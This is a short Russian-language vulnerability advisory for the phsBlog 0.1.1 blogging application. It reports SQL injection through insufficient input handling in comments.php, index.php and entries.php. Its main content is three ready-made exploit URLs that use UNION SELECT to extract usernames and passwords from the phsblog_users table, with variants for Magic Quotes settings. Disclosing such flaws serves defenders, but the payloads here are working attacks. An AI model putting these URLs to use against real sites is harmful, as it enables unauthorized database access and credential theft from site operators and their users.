Программа: phsBlog 0.1.1
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных сценариями comments.php, index.php и entries.php.
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
Magic Quotes = On/Off:
http://[host]/[phsBlog_path]/comments.php?eid=-1+UNION+SELECT+
concat_ws(0x3a,username,password),2+FROM+phsblog_users/*
Magic Quotes = Off:
http://[host]/[phsBlog_path]/index.php?cid='-1+UNION+SELECT+1,2,3,
concat(username,0x3a,password),5,6,7,8,9,10,11,12,13+FROM+phsblog_users/*
http://[host]/[phsBlog_path]/entries.php?urltitle='-1+UNION+SELECT+1,2,3, concat(username,0x3a,password),5,6,7,8,9,10,11,12,13+FROM+phsblog_users